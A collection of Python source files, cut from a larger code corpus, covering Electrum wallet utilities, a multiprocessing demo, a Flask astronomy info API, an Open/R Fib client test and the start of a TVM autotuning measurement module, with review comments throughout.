        self.print_error("Start memscan")
        gc.collect()
        objmap = defaultdict(list)
        for obj in gc.get_objects():
            for class_ in self.classes:
                if isinstance(obj, class_):
                    objmap[class_].append(obj)
        for class_, objs in objmap.items():
            self.print_error("%s: %d" % (class_.__name__, len(objs)))
        self.print_error("Finish memscan")

    def run(self):
        # rate-limit scans to one per `interval` seconds
        if time.time() > self.next_time:
            self.mem_stats()
            self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
    """ daemon thread that terminates cleanly

    Remembers its creator thread; is_running() turns False once stop() is
    called or the parent thread has died, letting subclass run-loops exit.
    Jobs (ThreadJob-like objects) can be registered and run via run_jobs().
    """

    def __init__(self):
        threading.Thread.__init__(self)
        # current_thread() is the modern alias of the deprecated
        # currentThread() (available since Python 2.6)
        self.parent_thread = threading.current_thread()
        self.running = False
        self.running_lock = threading.Lock()
        self.job_lock = threading.Lock()
        self.jobs = []

    def add_jobs(self, jobs):
        """Register jobs to be run by subsequent run_jobs() calls."""
        with self.job_lock:
            self.jobs.extend(jobs)

    def run_jobs(self):
        # Don't let a throwing job disrupt the thread, future runs of
        # itself, or other jobs.  This is useful protection against
        # malformed or malicious server responses
        with self.job_lock:
            for job in self.jobs:
                try:
                    job.run()
                except Exception:
                    # narrowed from a bare except so KeyboardInterrupt /
                    # SystemExit still propagate; job errors are reported
                    # and the remaining jobs still run
                    traceback.print_exc(file=sys.stderr)

    def remove_jobs(self, jobs):
        """Unregister previously added jobs."""
        with self.job_lock:
            for job in jobs:
                self.jobs.remove(job)

    def start(self):
        with self.running_lock:
            self.running = True
        return threading.Thread.start(self)

    def is_running(self):
        """True while stop() has not been called and the parent thread lives."""
        with self.running_lock:
            return self.running and self.parent_thread.is_alive()

    def stop(self):
        with self.running_lock:
            self.running = False

    def on_stop(self):
        # on Android the JNI thread must be detached before exiting
        if 'ANDROID_DATA' in os.environ:
            import jnius
            jnius.detach()
            self.print_error("jnius detach")
        self.print_error("stopped")
# global verbosity flag toggled by set_verbosity(); gates print_error only
is_verbose = False

def set_verbosity(b):
    """Globally enable or disable verbose (stderr) output."""
    global is_verbose
    is_verbose = b

def print_error(*args):
    """Write args to stderr, but only when verbose mode is on."""
    if is_verbose:
        print_stderr(*args)

def print_stderr(*args):
    """Write args to stderr, space-separated and newline-terminated."""
    sys.stderr.write(" ".join(str(item) for item in args) + "\n")
    sys.stderr.flush()

def print_msg(*args):
    """Write args to stdout, space-separated and newline-terminated."""
    sys.stdout.write(" ".join(str(item) for item in args) + "\n")
    sys.stdout.flush()
def json_encode(obj):
    """Pretty-print obj as JSON (Transaction-aware via MyEncoder); falls back
    to repr() for objects that are not JSON-serializable."""
    try:
        s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
    except TypeError:
        s = repr(obj)
    return s
def json_decode(x):
    """Best-effort JSON decode: parse x, mapping floats to Decimal; return x
    unchanged if it is not valid JSON (or not a string at all).

    Fixes a latent NameError: this module imports Decimal directly
    (`from decimal import Decimal`), so the old `decimal.Decimal` reference
    always raised, and the bare `except` silently returned the input
    undecoded every time.
    """
    try:
        return json.loads(x, parse_float=Decimal)
    except (ValueError, TypeError):
        # ValueError: malformed JSON; TypeError: non-string input
        return x
# decorator that prints execution time
def profiler(func):
    """Decorator: report the wrapped function's wall-clock run time through
    print_error (so it only appears in verbose mode)."""
    def do_profile(func, args, kw_args):
        # func.__name__ works on both Python 2 and 3; the previous
        # func.func_name attribute was Python 2 only
        name = func.__name__
        t0 = time.time()
        o = func(*args, **kw_args)
        t = time.time() - t0
        print_error("[profiler]", name, "%.4f"%t)
        return o
    return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
    """Return the Android external-storage root path (via jnius)."""
    import jnius
    env = jnius.autoclass('android.os.Environment')
    return env.getExternalStorageDirectory().getPath()

def android_data_dir():
    """Return this app's private data directory on Android."""
    import jnius
    PythonActivity = jnius.autoclass('org.renpy.android.PythonActivity')
    return PythonActivity.mActivity.getFilesDir().getPath() + '/data'

def android_headers_path():
    """Return the blockchain_headers file path on external storage,
    creating its parent directory if needed."""
    path = android_ext_dir() + '/org.electrum.electrum/blockchain_headers'
    d = os.path.dirname(path)
    if not os.path.exists(d):
        os.mkdir(d)
    return path

def android_check_data_dir():
    """ if needed, move old directory to sandbox """
    ext_dir = android_ext_dir()
    data_dir = android_data_dir()
    old_electrum_dir = ext_dir + '/electrum'
    # one-time migration from the legacy external-storage layout
    if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
        import shutil
        # headers are moved separately because they live outside data_dir
        new_headers_path = android_headers_path()
        old_headers_path = old_electrum_dir + '/blockchain_headers'
        if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
            print_error("Moving headers file to", new_headers_path)
            shutil.move(old_headers_path, new_headers_path)
        print_error("Moving data to", data_dir)
        shutil.move(old_electrum_dir, data_dir)
    return data_dir
def get_headers_path(config):
    """Return the location of the blockchain_headers file for this platform."""
    if 'ANDROID_DATA' in os.environ:
        # Android keeps headers on external storage
        return android_headers_path()
    return os.path.join(config.path, 'blockchain_headers')
def user_dir():
    """Return the per-user Electrum data directory for this platform,
    or None when no suitable environment variable is set."""
    env = os.environ
    if "HOME" in env:                  # unix-like
        return os.path.join(env["HOME"], ".electrum")
    if "APPDATA" in env:               # windows roaming profile
        return os.path.join(env["APPDATA"], "Electrum")
    if "LOCALAPPDATA" in env:          # windows local profile
        return os.path.join(env["LOCALAPPDATA"], "Electrum")
    if 'ANDROID_DATA' in env:
        return android_check_data_dir()
    # no home directory found in environment variables; caller handles None
    return None
def format_satoshis_plain(x, decimal_point = 8):
    '''Display a satoshi amount scaled.  Always uses a '.' as a decimal
    point and has no thousands separator'''
    value = Decimal(x) / pow(10, decimal_point)
    # render with full precision, then trim trailing zeros and a bare point
    return "{:.8f}".format(value).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
    """Format a satoshi amount for display, using the locale's decimal point
    and thousands grouping.

    is_diff     : prefix positive values with '+'
    num_zeros   : minimum number of fractional digits to keep
    decimal_point: scaling exponent (8 => BTC)
    whitespaces : pad to a fixed 15-character column
    """
    from locale import localeconv
    if x is None:
        return 'unknown'
    x = int(x)  # Some callers pass Decimal; note this truncates sub-satoshi amounts
    scale_factor = pow (10, decimal_point)
    integer_part = "{:n}".format(int(abs(x) / scale_factor))
    if x < 0:
        integer_part = '-' + integer_part
    elif is_diff:
        integer_part = '+' + integer_part
    dp = localeconv()['decimal_point']
    fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
    fract_part = fract_part.rstrip('0')
    if len(fract_part) < num_zeros:
        fract_part += "0" * (num_zeros - len(fract_part))
    result = integer_part + dp + fract_part
    if whitespaces:
        # pad right to align decimal points, then left to a fixed width
        result += " " * (decimal_point - len(fract_part))
        result = " " * (15 - len(result)) + result
    # NOTE(review): str.decode is Python 2 only; this line breaks on Python 3
    return result.decode('utf8')
def timestamp_to_datetime(timestamp):
    """Convert a POSIX timestamp to a local datetime, or None if conversion
    fails (None/non-numeric input, or out-of-range value).

    The previous bare `except` also swallowed KeyboardInterrupt/SystemExit;
    only the exceptions fromtimestamp() actually raises are caught now.
    """
    try:
        return datetime.fromtimestamp(timestamp)
    except (TypeError, ValueError, OverflowError, OSError):
        return None
def format_time(timestamp):
    """Render a POSIX timestamp as 'YYYY-MM-DD HH:MM' (ISO minus seconds),
    or a translated 'Unknown' when conversion fails."""
    date = timestamp_to_datetime(timestamp)
    return date.isoformat(' ')[:-3] if date else _("Unknown")


# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
    """Human-readable age of `from_date` (a POSIX timestamp) relative to
    `since_date` (defaults to now), e.g. '5 minutes ago' or 'in 2 days'."""
    if from_date is None:
        return "Unknown"
    from_date = datetime.fromtimestamp(from_date)
    if since_date is None:
        since_date = datetime.now(target_tz)
    td = time_difference(from_date - since_date, include_seconds)
    return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
    """Approximate a timedelta as English prose ('5 minutes', 'about 1 hour',
    '2 days', ...); the sign of the delta is ignored."""
    seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
    minutes = int(round(seconds/60))
    # under-two-minutes deltas get finer-grained wording
    if minutes <= 1:
        if not include_seconds:
            return "less than a minute" if minutes == 0 else "1 minute"
        for remainder in [5, 10, 20]:
            if seconds < remainder:
                return "less than %s seconds" % remainder
        if seconds < 40:
            return "half a minute"
        if seconds < 60:
            return "less than a minute"
        return "1 minute"
    # coarser buckets, from minutes up to years
    if minutes < 45:
        return "%s minutes" % minutes
    if minutes < 90:
        return "about 1 hour"
    if minutes < 1440:
        return "about %d hours" % (round(minutes / 60.0))
    if minutes < 2880:
        return "1 day"
    if minutes < 43220:
        return "%d days" % (round(minutes / 1440))
    if minutes < 86400:
        return "about 1 month"
    if minutes < 525600:
        return "%d months" % (round(minutes / 43200))
    if minutes < 1051200:
        return "about 1 year"
    return "over %d years" % (round(minutes / 525600))
# explorer name -> (base url, {resource kind -> url path segment})
block_explorer_info = {
    'Biteasy.com': ('https://www.biteasy.com/blockchain',
                        {'tx': 'transactions', 'addr': 'addresses'}),
    'Bitflyer.jp': ('https://chainflyer.bitflyer.jp',
                        {'tx': 'Transaction', 'addr': 'Address'}),
    'Blockchain.info': ('https://blockchain.info',
                        {'tx': 'tx', 'addr': 'address'}),
    'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion',
                        {'tx': 'tx', 'addr': 'address'}),
    'Blockr.io': ('https://btc.blockr.io',
                        {'tx': 'tx/info', 'addr': 'address/info'}),
    'Blocktrail.com': ('https://www.blocktrail.com/BTC',
                        {'tx': 'tx', 'addr': 'address'}),
    'BTC.com': ('https://chain.btc.com',
                        {'tx': 'tx', 'addr': 'address'}),
    'Chain.so': ('https://www.chain.so',
                        {'tx': 'tx/BTC', 'addr': 'address/BTC'}),
    'Insight.is': ('https://insight.bitpay.com',
                        {'tx': 'tx', 'addr': 'address'}),
    'TradeBlock.com': ('https://tradeblock.com/blockchain',
                        {'tx': 'tx', 'addr': 'address'}),
    'system default': ('blockchain:',
                        {'tx': 'tx', 'addr': 'address'}),
}

def block_explorer(config):
    """Name of the user's configured block explorer (default Blockchain.info)."""
    return config.get('block_explorer', 'Blockchain.info')

def block_explorer_tuple(config):
    """(base_url, path_map) for the configured explorer, or None if unknown."""
    return block_explorer_info.get(block_explorer(config))

def block_explorer_URL(config, kind, item):
    """Full explorer URL for `item` of `kind` ('tx' or 'addr'), or None when
    the explorer or resource kind is not supported."""
    explorer = block_explorer_tuple(config)
    if not explorer:
        return None
    base_url, path_map = explorer
    kind_str = path_map.get(kind)
    if not kind_str:
        return None
    return "/".join([base_url, kind_str, item])
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
    """Parse a BIP21 'bitcoin:' URI (or a bare address) into a dict with keys
    such as 'address', 'amount' (in satoshis), 'message', 'memo', 'time',
    'exp', 'sig'.  If the URI carries a payment request ('r', or 'name'+'sig'),
    it is fetched/deserialized on a daemon thread and handed to `on_pr`.

    Raises BaseException for strings that are neither an address nor a
    bitcoin URI.  (Python 2 code: urlparse module, str.decode.)
    """
    import bitcoin
    from bitcoin import COIN
    # a bare address with no scheme is accepted as shorthand
    if ':' not in uri:
        if not bitcoin.is_address(uri):
            raise BaseException("Not a bitcoin address")
        return {'address': uri}
    u = urlparse.urlparse(uri)
    if u.scheme != 'bitcoin':
        raise BaseException("Not a bitcoin URI")
    address = u.path
    # python for android fails to parse query
    if address.find('?') > 0:
        address, query = u.path.split('?')
        pq = urlparse.parse_qs(query)
    else:
        pq = urlparse.parse_qs(u.query)
    # BIP21 keys must not be repeated
    for k, v in pq.items():
        if len(v)!=1:
            raise Exception('Duplicate Key', k)
    out = {k: v[0] for k, v in pq.items()}
    if address:
        if not bitcoin.is_address(address):
            raise BaseException("Invalid bitcoin address:" + address)
        out['address'] = address
    if 'amount' in out:
        am = out['amount']
        # amounts may use the 'NNNXd' exponent notation (d = decimal places)
        m = re.match('([0-9\.]+)X([0-9])', am)
        if m:
            k = int(m.group(2)) - 8
            amount = Decimal(m.group(1)) * pow(  Decimal(10) , k)
        else:
            amount = Decimal(am) * COIN
        out['amount'] = int(amount)
    if 'message' in out:
        out['message'] = out['message'].decode('utf8')
        out['memo'] = out['message']
    if 'time' in out:
        out['time'] = int(out['time'])
    if 'exp' in out:
        out['exp'] = int(out['exp'])
    if 'sig' in out:
        out['sig'] = bitcoin.base_decode(out['sig'], None, base=58).encode('hex')
    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    if r or (name and sig):
        # resolve the payment request off the caller's thread; on_pr is
        # invoked from that worker thread when the request is available
        def get_payment_request_thread():
            import paymentrequest as pr
            if name and sig:
                s = pr.serialize_request(out).SerializeToString()
                request = pr.PaymentRequest(s)
            else:
                request = pr.get_payment_request(r)
            on_pr(request)
        t = threading.Thread(target=get_payment_request_thread)
        t.setDaemon(True)
        t.start()
    return out
def create_URI(addr, amount, message):
    """Build a BIP21 'bitcoin:' URI for addr with optional amount (satoshis)
    and message.  Returns "" for an invalid address.
    (Python 2 code: `unicode`, urllib.quote, urlparse module.)"""
    import bitcoin
    if not bitcoin.is_address(addr):
        return ""
    query = []
    if amount:
        # amount is rendered in BTC with no trailing zeros
        query.append('amount=%s'%format_satoshis_plain(amount))
    if message:
        if type(message) == unicode:
            message = message.encode('utf8')
        query.append('message=%s'%urllib.quote(message))
    p = urlparse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
    return urlparse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
def raw_input(prompt=None):
    """Replacement raw_input that writes the prompt to stdout explicitly
    (works around the stdin/stderr redirection bug above)."""
    if prompt:
        sys.stdout.write(prompt)
    return builtin_raw_input()

# monkey-patch the builtin so all callers get the fixed behaviour
# (Python 2 only: the __builtin__ module)
import __builtin__
builtin_raw_input = __builtin__.raw_input
__builtin__.raw_input = raw_input
def parse_json(message):
    """Split one newline-terminated JSON document off the front of `message`.

    Returns (obj, remainder).  obj is None when there is no complete line yet
    (remainder is the whole message) or when the first line is not valid JSON
    (that line is consumed and dropped).
    """
    n = message.find('\n')
    if n == -1:
        # no complete line buffered yet
        return None, message
    try:
        j = json.loads( message[0:n] )
    except ValueError:
        # malformed JSON line; the bare except here previously also swallowed
        # KeyboardInterrupt/SystemExit
        j = None
    return j, message[n+1:]
# Raised by SocketPipe/QueuePipe when a read times out; callers poll again.
class timeout(Exception):
    pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
    """Newline-delimited JSON message pipe over a (possibly SSL) socket.

    get() returns one decoded message, raises `timeout` when no complete
    message is available yet, and returns None when the peer closed the
    connection.  (Python 2 code: `except socket.error, err` syntax.)
    """
    def __init__(self, socket):
        self.socket = socket
        self.message = ''            # receive buffer of undecoded bytes
        self.set_timeout(0.1)
        self.recv_time = time.time() # last time data arrived, for idle_time()

    def set_timeout(self, t):
        self.socket.settimeout(t)

    def idle_time(self):
        """Seconds since data was last received."""
        return time.time() - self.recv_time

    def get(self):
        """Return the next JSON message; raise `timeout` if none is complete;
        return None once the remote side has closed the connection."""
        while True:
            response, self.message = parse_json(self.message)
            if response is not None:
                return response
            try:
                data = self.socket.recv(1024)
            except socket.timeout:
                raise timeout
            except ssl.SSLError:
                raise timeout
            except socket.error, err:
                # NOTE(review): 60 looks like ETIMEDOUT on BSD/macOS; 11/35
                # are EAGAIN variants and 10035 is Windows WSAEWOULDBLOCK --
                # confirm these platform constants.
                if err.errno == 60:
                    raise timeout
                elif err.errno in [11, 35, 10035]:
                    print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
                    time.sleep(0.2)
                    raise timeout
                else:
                    print_error("pipe: socket error", err)
                    data = ''
            except:
                traceback.print_exc(file=sys.stderr)
                data = ''
            if not data:  # Connection closed remotely
                return None
            self.message += data
            self.recv_time = time.time()

    def send(self, request):
        """Serialize one request and send it, newline terminated."""
        out = json.dumps(request) + '\n'
        self._send(out)

    def send_all(self, requests):
        """Serialize and send a batch of requests in a single write."""
        out = ''.join(map(lambda x: json.dumps(x) + '\n', requests))
        self._send(out)

    def _send(self, out):
        # retry partial writes and transient EAGAIN/timeout conditions until
        # the whole payload has been flushed to the socket
        while out:
            try:
                sent = self.socket.send(out)
                out = out[sent:]
            except ssl.SSLError as e:
                print_error("SSLError:", e)
                time.sleep(0.1)
                continue
            except socket.error as e:
                if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
                    print_error("EAGAIN: retrying")
                    time.sleep(0.1)
                    continue
                elif e[0] in ['timed out', 'The write operation timed out']:
                    print_error("socket timeout, retry")
                    time.sleep(0.1)
                    continue
                else:
                    traceback.print_exc(file=sys.stdout)
                    raise e
import Queue
class QueuePipe:
    """In-process pipe built from a pair of queues.

    Mirrors SocketPipe's get/send interface so the two are interchangeable.
    """

    def __init__(self, send_queue=None, get_queue=None):
        self.send_queue = send_queue if send_queue else Queue.Queue()
        self.get_queue = get_queue if get_queue else Queue.Queue()
        self.set_timeout(0.1)

    def set_timeout(self, t):
        self.timeout = t

    def get(self):
        """Block up to self.timeout for one message; raise `timeout` if none."""
        try:
            return self.get_queue.get(timeout=self.timeout)
        except Queue.Empty:
            raise timeout

    def get_all(self):
        """Drain and return every message currently queued, without blocking."""
        drained = []
        while True:
            try:
                drained.append(self.get_queue.get_nowait())
            except Queue.Empty:
                return drained

    def send(self, request):
        self.send_queue.put(request)

    def send_all(self, requests):
        for item in requests:
            self.send(item)
class StoreDict(dict):
    """A dict persisted as pretty-printed JSON in a file under config.path.

    Every mutation made through __setitem__/pop is written back to disk
    immediately.  A missing or unreadable file simply yields an empty dict.
    """

    def __init__(self, config, name):
        self.config = config
        self.path = os.path.join(self.config.path, name)
        self.load()

    def load(self):
        """Populate self from the JSON file; start empty if it is absent/corrupt."""
        try:
            with open(self.path, 'r') as f:
                self.update(json.loads(f.read()))
        # Bug fix: the bare `except:` also swallowed KeyboardInterrupt and
        # SystemExit; only I/O failures and malformed JSON are best-effort.
        except (IOError, OSError, ValueError):
            pass

    def save(self):
        """Write the current contents to disk as sorted, indented JSON."""
        with open(self.path, 'w') as f:
            # Unused return-value binding removed (was `r = f.write(s)`).
            f.write(json.dumps(self, indent=4, sort_keys=True))

    def __setitem__(self, key, value):
        dict.__setitem__(self, key, value)
        self.save()

    def pop(self, key):
        # Unlike dict.pop, a missing key is silently ignored and nothing is
        # returned; the file is only rewritten when something was removed.
        if key in self:
            dict.pop(self, key)
            self.save()
def check_www_dir(rdir):
    """Ensure the web root *rdir* exists and contains the static assets.

    Creates the directory if needed, copies the bundled index.html on first
    run, and downloads the third-party JS/CSS files referenced below —
    only those not already present on disk.
    """
    import urllib, urlparse, shutil, os
    if not os.path.exists(rdir):
        os.mkdir(rdir)
    index = os.path.join(rdir, 'index.html')
    if not os.path.exists(index):
        print_error("copying index.html")
        src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
        shutil.copy(src, index)
    files = [
        "https://code.jquery.com/jquery-1.9.1.min.js",
        "https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
        "https://code.jquery.com/ui/1.10.3/jquery-ui.js",
        "https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
    ]
    for URL in files:
        # Derive the local filename from the URL path component.
        path = urlparse.urlsplit(URL).path
        filename = os.path.basename(path)
        path = os.path.join(rdir, filename)
        if not os.path.exists(path):
            print_error("downloading ", URL)
            # NOTE(review): downloads are not integrity-checked; this
            # assumes a trusted network — confirm that is acceptable.
            urllib.urlretrieve(URL, path)
|
test_server.py | #!/usr/bin/env python
from multiprocessing import Process, Manager
def f(d, l):
    """Populate the shared dict with mixed-type keys and reverse the shared list in place."""
    for key, value in ((1, '1'), ('2', 2), (0.25, None)):
        d[key] = value
    l.reverse()
if __name__ == '__main__':
    # Demonstrate that Manager proxies propagate mutations made inside a
    # child process back to the parent.
    manager = Manager()
    d = manager.dict()
    l = manager.list(range(10))

    p = Process(target=f, args=(d, l))
    p.start()
    p.join()

    # Both print the child's modifications: the seeded dict entries and
    # the reversed list.
    print(d)
    print(l)
|
info_api.py | import queue
import json
import os
import datetime
from threading import Thread
from flask import Response, request
from flask_restplus import Namespace, Resource
from flask.json import jsonify
from hti.server.state.events import subscribe_for_events, log_event
from hti.server.state.globals import (
get_catalog,
get_app_state,
get_frame_manager,
)
from .util import camel_case_keys_recursively, to_dict_recursively
from lib.coordinates import Coordinates
from lib.solver import Solver
# Flask-RESTPlus namespace under which all Info endpoints below are registered.
api = Namespace('Info', description='Info API endpoints')
@api.route('/events')
class EventsApi(Resource):
    @api.doc(
        description='Start to get server events',
        response={
            200: 'Success'
        }
    )
    def get(self):
        """Stream server events to the client as server-sent events (SSE)."""
        def gen():
            # This subscriber's private queue; subscribe_for_events fans
            # incoming events out to it.
            q = queue.Queue()
            subscribe_for_events(q)
            # Send an event with the current app state
            get_app_state().send_event()
            while True:
                data = q.get()  # blocks until the next event arrives
                # convert objects to dicts and make keys camel case
                data_dict = to_dict_recursively(data)
                camel_case_dict = camel_case_keys_recursively(data_dict)
                # SSE framing: "data: <payload>" followed by a blank line.
                yield f'data: {json.dumps(camel_case_dict)}\n\n'
        return Response(gen(), mimetype="text/event-stream")
@api.route('/target/<query>')
class QueryTargetApi(Resource):
    @api.doc(
        description='Get coordinates from target description',
        response={
            200: 'Success',
            404: 'Object not found in catalog'
        }
    )
    def get(self, query):
        """Resolve *query* — literal coordinates or a catalog name — to a target."""
        # First try to interpret the query as raw coordinates.
        coords = Coordinates.parse(query)
        if coords is not None:
            target = {'ra': coords.ra, 'dec': coords.dec}
            get_app_state().target = coords
            return jsonify(target)
        # Otherwise fall back to a catalog lookup by upper-cased name.
        entry = get_catalog().get_entry(query.upper())
        if entry is None:
            return '', 404
        coords = Coordinates.parse_csvformat(entry['RA'], entry['Dec'])
        target = {
            'name': entry['Name'],
            'ra': coords.ra,
            'dec': coords.dec,
            'type': entry.get('Type'),
            'const': entry.get('Const'),
            'minAx': entry.get('MinAx'),
            'majAx': entry.get('MajAx'),
            'posAng': entry.get('PosAng'),
        }
        get_app_state().target = coords
        return jsonify(target)
@api.route('/stars')
class QueryStarsApi(Resource):
    @api.doc(
        description='Get a list of stars based on query criteria',
        response={
            200: 'Success',
        }
    )
    def get(self):
        """Return up to `count` catalog stars, optionally restricted to a sky area."""
        # Bug fix: request.args values are strings, so a supplied ?count=
        # arrived as str while the default was the int 1000 — an
        # inconsistent type passed on to get_stars().  Convert explicitly.
        count = int(request.args.get('count', 1000))
        # Area bounds are forwarded as received (strings or None);
        # presumably parsed downstream — TODO confirm against get_stars().
        area = {
            'raMin': request.args.get('raMin'),
            'raMax': request.args.get('raMax'),
            'decMin': request.args.get('decMin'),
            'decMax': request.args.get('decMax'),
        } if 'raMin' in request.args else None
        stars = get_catalog().get_stars(area=area, count=count)
        return stars, 200
@api.route('/images/calibrate')
class CalibrateImageApi(Resource):
    @api.doc(
        description='Get calibration data of given image',
        response={
            200: 'Success',
            404: 'Image not found or failed to calibrate'
        }
    )
    def post(self):
        """Kick off plate-solving of a frame in a background thread.

        Responds 200 immediately; results are reported asynchronously via
        log events and app state (last_known_position).
        """
        body = request.json
        frame_path = body['framePath']
        timeout = float(body['timeout'])
        frame = get_frame_manager().get_frame_by_path(frame_path)
        if frame is None:
            return 'Frame not found', 404
        here = os.path.dirname(os.path.abspath(__file__))
        hti_static_dir = os.path.join(here, '..', '..', 'static')
        # The solver works on files on disk, so persist the frame first.
        if not frame.persisted:
            frame.persist(hti_static_dir)
        filepath = os.path.join(hti_static_dir, frame.path)

        app_state = get_app_state()

        def analyze_fun():
            # `calibrating` doubles as a cancellation flag: the stop
            # endpoint clears it and the solver polls it via run_callback.
            app_state.calibrating = True
            calibration_data = Solver().analyze_image(
                filepath,
                timeout,
                run_callback=lambda: app_state.calibrating,
            )
            app_state.calibrating = False
            timestamp = int(datetime.datetime.now().timestamp())
            if calibration_data is None:
                log_event('Calibration failed')
            else:
                rotation_angle = calibration_data.rotation_angle
                position = calibration_data.center_deg
                log_event(f'Image center: {position} Rotation: {rotation_angle}')
                if app_state.target is not None:
                    # Offset between the selected target and the solved center.
                    target_distance = Coordinates(
                        app_state.target.ra - position.ra,
                        app_state.target.dec - position.dec
                    )
                    log_event(f'Distance to target: {target_distance}')
                app_state.last_known_position = {
                    'timestamp': timestamp,
                    'position': position,
                }

        Thread(target=analyze_fun).start()
        return '', 200
@api.route('/images/calibrate/stop')
class StopCalibrationApi(Resource):
    """Stop a running calibration.

    Bug fix: this class was previously also named ``CalibrateImageApi``,
    shadowing the POST /images/calibrate resource class at module scope and
    giving the two endpoints identical resource names in the generated docs.
    Routing behavior is unchanged — registration happens via the decorator.
    """
    @api.doc(
        description='Stop running calibration',
        response={
            200: 'Success',
        }
    )
    def post(self):
        # The calibration worker polls this flag through its run_callback
        # and aborts when it turns False.
        get_app_state().calibrating = False
        return '', 200
@api.route('/directory')
class ListDirectoryApi(Resource):
    def _list_dir_recursively(self, path: str) -> list:
        """Return sorted entries of *path*; subdirectories become
        {'name': ..., 'children': [...]} dicts, files stay plain strings."""
        entries = sorted(os.listdir(path))
        for entry_index, entry in enumerate(entries):
            sub_path = os.path.join(path, entry)
            if os.path.isdir(sub_path):
                entries[entry_index] = {
                    'name': entry,
                    'children': self._list_dir_recursively(sub_path)
                }
        return entries

    @api.doc(
        description='List subdirectories and files of given directory',
        response={
            200: 'Success',
            400: 'Malformed request',
            404: 'Directory not found'
        }
    )
    def post(self):
        """List the contents of a directory inside the static tree."""
        body = request.json
        if body is None:
            return 'Missing request body', 400
        path = body.get('path')  # path is understood to be relative to static
        recursive = body.get('recursive', False)
        if path is None:
            return 'Missing path in request body', 400
        here = os.path.dirname(os.path.abspath(__file__))
        hti_static_dir = os.path.abspath(os.path.join(here, '..', '..', 'static'))
        final_path = os.path.normpath(os.path.join(hti_static_dir, path))
        # Security fix: `path` is untrusted client input and could contain
        # ".." segments that escape the static directory; reject anything
        # that resolves outside it.
        if os.path.commonpath([hti_static_dir, final_path]) != hti_static_dir:
            return 'Invalid path', 400
        if not os.path.isdir(final_path):
            return f'Directory {final_path} not found', 404
        if recursive:
            entries = self._list_dir_recursively(final_path)
        else:
            entries = os.listdir(final_path)
            entries.sort()
        return jsonify(entries)
|
fib_client_tests.py | #!/usr/bin/env python3
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from builtins import range
from builtins import object
from openr.utils import socket
from openr.clients import fib_client
from openr.Fib import ttypes as fib_types
import zmq
import unittest
from multiprocessing import Process
# Canned route database used as the fake server's fixed response; the client
# test below asserts it receives exactly this object.
route_db_cache = fib_types.RouteDatabase()
route_db_cache.thisNodeName = 'san jose 1'
class Fib(object):
    """Minimal fake Fib agent: answers every FibRequest with the canned route DB."""

    def __init__(self, zmq_ctx, url):
        self._fib_server_socket = socket.Socket(zmq_ctx, zmq.REP)
        self._fib_server_socket.bind(url)
        self._route_db_cache = route_db_cache

    def process_request(self):
        """Serve exactly one request/reply cycle on the REP socket."""
        srv = self._fib_server_socket
        srv.recv_thrift_obj(fib_types.FibRequest)
        srv.send_thrift_obj(self._route_db_cache)
class TestFibClient(unittest.TestCase):
    def test(self):
        """End-to-end check: a FibClient fetches the canned route DB from Fib."""
        num_req = 1

        def _fib_server():
            # Serve exactly num_req request(s), then let the process exit.
            fib_server = Fib(zmq.Context(), "tcp://*:5000")
            for _ in range(num_req):
                fib_server.process_request()

        def _fib_client():
            # NOTE(review): starting the client right after the server
            # process presumably relies on ZMQ queuing the request until
            # the server has bound port 5000 — confirm no race here.
            fib_client_inst = fib_client.FibClient(
                zmq.Context(), "tcp://localhost:5000")
            self.assertEqual(fib_client_inst.get_route_db(), route_db_cache)

        p = Process(target=_fib_server)
        p.start()
        q = Process(target=_fib_client)
        q.start()
        p.join()
        q.join()
|
measure_methods.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,too-many-function-args,too-many-nested-blocks
"""
Functions that run on executor for measurement.
These functions are responsible for building the tvm module, uploading it to
remote devices, recording the running time costs, and checking the correctness of the output.
"""
import logging
import shutil
import os
import threading
import time
from random import getrandbits
from collections import namedtuple
import tempfile
import numpy as np
from ... import ir_pass, build, build_config, nd, TVMError, register_func, \
rpc as _rpc, target as _target
from ...contrib import nvcc, ndk, tar
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo, Builder, Runner
from .local_executor import LocalExecutor
# Module-level logger shared by the autotvm measurement infrastructure.
logger = logging.getLogger('autotvm')
class BuildResult(namedtuple("BuildResult", ('filename', 'arg_info', 'error', 'time_cost'))):
    """
